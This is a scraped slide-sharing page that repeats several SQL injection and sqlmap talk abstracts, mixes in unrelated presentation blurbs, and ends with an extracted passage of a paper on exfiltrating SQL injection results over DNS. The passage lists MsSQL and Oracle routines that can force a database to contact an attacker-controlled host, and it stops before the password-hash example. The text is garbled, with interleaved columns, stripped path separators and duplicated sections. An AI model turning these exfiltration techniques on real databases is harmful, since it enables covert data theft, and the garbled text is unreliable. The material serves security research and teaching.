These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
In computing, a denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet - Wikipedia
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android and iOS Applications and supports both binaries (APK & IPA) and zipped source code. MobSF can also perform Web API Security testing with it's API Fuzzer that can do Information Gathering, analyze Security Headers, identify Mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to Session and API Rate Limiting.
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
SQL injection is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for execution.
This is a method to attack web applications that have a data repository.The
attacker would send a specially crafted SQL statement that is designed to cause
some malicious action.SQL injection is an attack technique that exploits a security
vulnerability occurring in the database layer of an application and a service. This
is most often found within web pages with dynamic content.
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
Web Application Security is not hard, but it’s easy to get it wrong as writing secure code is not easy as preaching. So to overcome incidents happening from such unforeseen events, organisations tend to rely on Web Application Firewalls or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them either work outside or around the web applications and act by intercepting the HTTP request coming to the web server, then take a decision to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application like how the user input is getting interpreted, Is the application/server under heavy load?, Is the attacker exfiltrating data by exploiting an SQLi that WAF couldn’t detect? etc. The strength of traditional WAF depends on manual or predefined rules/signature. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won’t be able to prevent an attack as they don’t know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next generation web application defending technology dubbed as Runtime Application Self Protection (RASP) that works by understanding your application to defend against web attacks by working inside the web application. RASP relies on Runtime Patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all the code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at framework api or language api level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal etc and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS etc. This research is carried out by implementing a RASP module to a vulnerable web application written in python using tornado framework with sqlite backend.
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
In computing, a denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet - Wikipedia
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android and iOS Applications and supports both binaries (APK & IPA) and zipped source code. MobSF can also perform Web API Security testing with it's API Fuzzer that can do Information Gathering, analyze Security Headers, identify Mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to Session and API Rate Limiting.
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
SQL injection is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for execution.
This is a method to attack web applications that have a data repository.The
attacker would send a specially crafted SQL statement that is designed to cause
some malicious action.SQL injection is an attack technique that exploits a security
vulnerability occurring in the database layer of an application and a service. This
is most often found within web pages with dynamic content.
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
Web Application Security is not hard, but it’s easy to get it wrong as writing secure code is not easy as preaching. So to overcome incidents happening from such unforeseen events, organisations tend to rely on Web Application Firewalls or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them either work outside or around the web applications and act by intercepting the HTTP request coming to the web server, then take a decision to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application like how the user input is getting interpreted, Is the application/server under heavy load?, Is the attacker exfiltrating data by exploiting an SQLi that WAF couldn’t detect? etc. The strength of traditional WAF depends on manual or predefined rules/signature. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won’t be able to prevent an attack as they don’t know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next generation web application defending technology dubbed as Runtime Application Self Protection (RASP) that works by understanding your application to defend against web attacks by working inside the web application. RASP relies on Runtime Patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all the code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at framework api or language api level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal etc and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS etc. This research is carried out by implementing a RASP module to a vulnerable web application written in python using tornado framework with sqlite backend.
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
Presentación de Jaime Nebrera de Eneo Tecnología S.L., durante la XV Jornada de Seguridad TI de Nextel S.A. en la Alhóndiga de Bilbao el jueves 27 de junio de 2013.
ABSTRACT
Malicious use and exploitation of Dynamic Domain Name Services (DDNS) capabilities poses a serious threat to the information security of organisations and businesses. In recent times, many malware writers have relied on DDNS to maintain their Command and Control (C&C) network infrastructure to ensure a persistence presence on a compromised host. Amongst the various DDNS techniques, Domain Generation Algorithm (DGA) is often perceived as the most elusive and difficult to detect using traditional methods. This paper presents an approach for detecting DGA using frequency analysis of the character distribution and the weighted scores of the domain names. The approach’s feasibility is demonstrated using a range of legitimate domains and a number of malicious algorithmically-generated domain names. When a weighted score of < 45 is applied to the Alexa one million list of domain names, only 15% of the domain names were treated as non-human generated.
DETECTION OF ALGORITHMICALLYGENERATED MALICIOUS DOMAIN USING FREQUENCY ANALYSISijcsit
Malicious use and exploitation of Dynamic Domain Name Services (DDNS) capabilities poses a serious threat to the information security of organisations and businesses. In recent times, many malware writers have relied on DDNS to maintain their Command and Control (C&C) network infrastructure to ensure a persistence presence on a compromised host. Amongst the various DDNS techniques, Domain Generation
Algorithm (DGA) is often perceived as the most elusive and difficult to detect using traditional methods. This paper presents an approach for detecting DGA using frequency analysis of the character distribution and the weighted scores of the domain names. The approach’s feasibility is demonstrated using a range of legitimate domains and a number of malicious algorithmically-generated domain names. When a weighted
score of < 45 is applied to the Alexa one million list of domain names, only 15% of the domain names were treated as non-human generated.
Presentation on 'The Path to Resolverless DNS' by Geoff HustonAPNIC
Presentation on 'The Path to Resolverless DNS' by Geoff Huston for OARC 39 and 47th CENTR technical workshop, held in Belgrade on 22 and 23 October 2022
Nowadays DNS is used to load balance, failover, and geographically redirect connections. DNS has become so pervasive it is hard to identify a modern TCP/IP connection that does not use DNS in some way. Unfortunately, due to the reliability built into the fundamental RFC-based design of DNS, most IT professionals don't spend much time worrying about it. If DNS is maliciously attacked — altering the addresses it gives out or taken offline the damage will be enormous. Whether conducted for political motives, financial gain, or just the notoriety of the attacker, the damage from a DNS attack can be devastating for the target.
In this research we will review different DNS advanced attacks and analyze them. We will survey some of the most DNS vulnerabilities and ways of DNS attacks protection.
This is a presentation about DNS Cache Poisoning which was presented to the Grey H@t club at Georgia Tech. It covers the basics of DNS, how DNS is vulnerable, the effect of exploiting DNS, and the Kaminsky attack.
A presentation on DNS concepts. It covers the topics DNS Introduction, DNS Hierarchy, DNS Resolution Process,
DNS Components, DNS Types, DNSSEC, DNS over TLS (DoT) & HTTPS (DoH), Oblivious DNS (ODoH).
These are the slides from a guest talk "2014 – Year of Broken Name Generator(s)" held at Faculty of Electrical Engineering and Computing 2015 (Croatia / Zagreb 16th January 2015) by Miroslav Stampar
These are the slides from a talk "Riding the Overflow - Then and Now" held at BalCCon 2014 (Serbia / Novi Sad 06th September 2014) by Miroslav Stampar
p.s. this presentation along with presented buffer overflow examples can be found at: http://www.mediafire.com/download/gjeue4wvw2iccc9/balccon2k14_overflow.7z
These are the slides from a guest talk "Hash DoS Attack" held at Faculty of Electrical Engineering and Computing 2014 (Croatia / Zagreb 17th January 2014) by Miroslav Stampar
These are the slides from a talk "Heuristic methods
used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) by Miroslav Stampar
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Data Retrieval over DNS in SQL Injection Attacks
1. Data Retrieval over DNS in SQL Injection Attacks
Miroslav Štampar
AVL-AST d.o.o., Zagreb, Croatia
miroslav.stampar@avl.com
Abstract table. What is going to be described is the technique
This paper describes an advanced SQL injection where attackers can retrieve results for malicious SQL
technique where DNS resolution process is exploited for queries (e.g. administrator password) by provoking
retrieval of malicious SQL query results. Resulting DNS specially crafted DNS requests from vulnerable Database
requests are intercepted by attackers themselves at the Management System (DBMS) and intercepting those at
controlled remote name server extracting valuable data. the other end, transferring dozens of resulting characters
Open source SQL injection tool sqlmap [1] has been per single iteration.
adjusted to automate this task. With modifications done,
attackers are able to use this technique for fast and low- 2 Technique classification
profile data retrieval, especially in cases where other
Depending on the transport channel used for data
standard ones fail.
retrieval, SQLi techniques can be divided into three
independent classes: inband, inference and out-of-band
1 Introduction [6][7].
Exfiltration is a military term for removal of assets Inband techniques use existing channel between
from within enemy territory by covert means. It now has attackers and a vulnerable web application to extract data.
an excellent modern usage in computing, meaning the Usually that channel is the standard web server response.
illicit extraction of data from a system. The most covert It's member union technique2 uses existing web page
data extraction method is considered to be the Domain output, while error-based technique uses provoked
Name Server (DNS) exfiltration [2]. This method can specific DBMS error messages, both carrying results for
even be used on systems without a public network the executed malicious SQL query.
connection by resolving domain name queries outside the
perimeter of trusted hosts through a series of internal and Inference techniques extract malicious SQL query
external name servers. results in a bit-by-bit manner, never transferring actual
data. Rather, a difference in the way an application
DNS is a relatively simple protocol. Both the query behaves allows attackers to infer the value of the data. As
made by a DNS client and the corresponding response the core of inference is a question [8], it consists of
provided by a DNS server use the same basic DNS carrying out a series of boolean queries to the server,
message format. With the exception of zone transfers, observing and finally deducing the meaning of received
which use TCP for the sake of reliability, DNS messages answers. Depending upon the observed characteristics, it's
are encapsulated within a UDP datagram. To someone members are called boolean-based blind and time-based
monitoring a machine with a tool like Wireshark [3], a technique. In boolean-based blind technique visible
covert channel implemented over DNS would look like a changes inside web server response are used for
series of little blips that flash in and out of existence [4]. distinguishing answers for the given logical questions,
The act of relaying DNS queries from secure systems while in time-based technique3 changes in web server
to arbitrary internet-based name servers forms the basis of response times are observed4.
this uncontrolled data channel. Even if we assume that Out-of-band (OOB) techniques, contrary to inband
connections to public networks are not allowed, if the ones, use alternative transport channel(s) for data
target host is able to resolve arbitrary domain names, data retrieval, like Hypertext Transfer Protocol (HTTP) or
exfiltration is possible via forwarded DNS queries [5]. DNS resolution. Exploitation using OOB techniques
When other faster SQL injection (SQLi) data retrieval becomes interesting when detailed error messages are
techniques fail, data is usually retrieved in bit-by-bit disabled, results are being limited or filtered, outbound
manner, which is very noisy1 and time consuming
process. Thus, attackers will typically need tens of 2
Included full and partial union techniques distinguished by the number
thousands of requests to retrieve content of a regular sized of resulting rows contained in web server response
3
Also included a stacked-queries technique retrieving results in same
1 manner
Noisy in means of both traffic and system resources used by the
4
vulnerable web server For example, delayed response for True and regular response for False
2. filter rules are lax, inference methods look like the only name query. Also, it's assumed that the name queried by
option and/or when reducing the number of queries is of the client is for a domain name of which the server has no
utter importance [9]. For example, in HTTP based OOB local knowledge, based on its configured zones.
technique SQL query result is becoming a part of HTTP
First, default DNS server parses the full name and
request (e.g. GET parameter value) toward HTTP server
determines that it needs the location of the server that is
controlled by attackers having access to the log files. This
authoritative for the Top-Level Domain (TLD) – in this
class of techniques is not as much widely used in the
case com. It then uses an iterative (nonrecursive) query to
mainstream as others, mostly because of complexity of
that server to obtain a referral for the example.com
required setup, but using those many obstacles could
domain.
potentially be overcome (e.g. avoiding undesired database
writes and huge speed improvement of time-based SQLi After it's address has been retrieved, referred server is
on INSERT/UPDATE vulnerable statements). contacted – which is actually a registered name server for
the example.com domain. As it contains the queried name
3 DNS resolution as part of its configured zones, it responds authoritatively
back to the original server that initiated the process with
When a client needs to look up a network name used the resulting IP address.
inside a program, it queries DNS servers. DNS queries
resolve in a number of different ways: When the original DNS server receives the response
indicating that an authoritative answer was obtained for
• A client can answer a query locally using cached the requested query, it forwards this answer back to the
information if it was already obtained previously client and the recursive query process ends [11]. This type
with an identical query. of resolution is typically initiated by the DNS server that
• DNS server can use its own cache and/or zone attempts to resolve a recursive name query for the DNS
record information to answer the query – this client and is sometimes being referred to as "walking the
process is known as iterative. tree" [12].
• DNS server can also forward the query to other 4 Provoking DNS requests
DNS servers on behalf of the requesting client to
fully resolve the name, then send the answer Prerequisite for a successful DNS exfiltration of data
back to the client – this process is known as from a vulnerable database is the availability of DBMS
recursive [10]. subroutines that directly or indirectly provoke DNS
resolution process. Those kind of subroutines are then
For example, consider usage of recursion process to used by attackers in SQLi vectors. Any function that
resolve the name test.example.com. It occurs when a DNS accepts network address is most probably exploitable for
server and a client are first started and have no locally this kind of attack.
cached information that could be used to resolve that
4.1 Microsoft SQL Server
An extended stored procedure is a dynamic link
library that runs directly in the address space of Microsoft
SQL Server (MsSQL). There are couple of undocumented
extended stored procedures that can be found particularly
useful for this paper's purpose [13].
Attackers can exploit any of the following extended
stored procedures to provoke DNS address resolution by
using Microsoft Windows Universal Naming Convention
(UNC) file and directory path format. The UNC syntax
for Windows systems has the generic form:
ComputerNameSharedFolderResource
By using custom crafted address as a value for the
field ComputerName attackers are able to provoke DNS
requests.
Figure 1: Recursive DNS resolution
3. 4.1.1 master..xp_dirtree 4.2 Oracle
Extended stored procedure master..xp_dirtree() is used Oracle supplies bundle of PL/SQL packages with it's
to get a list of all folders and their subfolders inside the Oracle Database Server to extend database functionality.
given folder: Couple of these are especially made for network access
master..xp_dirtree '<dirpath>' making them specially interesting for this paper's
purpose7.
For example, to get a list of all folders and their
subfolders inside the C:Windows run: 4.2.1 UTL_INADDR.GET_HOST_ADDRESS
EXEC master..xp_dirtree 'C:Windows'; Package UTL_INADDR provides procedures for
internet addressing support – like retrieving host names
4.1.2 master..xp_fileexist and IP addresses of local and remote hosts. Member
Extended stored procedure master..xp_fileexist() is function GET_HOST_ADDRESS() retrieves the IP
used to determine whether a particular file exists on the address of the specified host:
disk: UTL_INADDR.GET_HOST_ADDRESS('<host>')
xp_fileexist '<filepath>' For example, to get the IP address of host
For example, to check whether the file boot.ini exists test.example.com run:
on disk C: run: SELECT
EXEC master..xp_fileexist 'C:boot.ini'; UTL_INADDR.GET_HOST_ADDRESS('test.example.c
om');
4.1.3 master..xp_subdirs
4.2.2 UTL_HTTP.REQUEST
Extended stored procedure master..xp_subdirs() is
Package UTL_HTTP makes HTTP callouts from SQL
used to get a list of folders inside the given folder5:
and PL/SQL. It's procedure REQUEST() returns up to
master..xp_subdirs '<dirpath>' first 2000 bytes of data retrieved from the given address:
For example, to get a list of all folders with depth 1 UTL_HTTP.REQUEST('<url>')
inside the C:Windows folder run:
For example, to get the first 2000 bytes of data from a
EXEC master..xp_subdirs 'C:Windows'; page located at http://test.example.com/index.php run:
SELECT
4.1.4 Example UTL_HTTP.REQUEST('http://test.example.com/i
What follows is the example where administrator's ndex.php') FROM DUAL;
(sa) password hash is being pushed through DNS
resolution mechanism by usage of MsSQL's extended 4.2.3 HTTPURITYPE.GETCLOB
stored procedure master..xp_dirtree()6: Instance method GETCLOB() of class
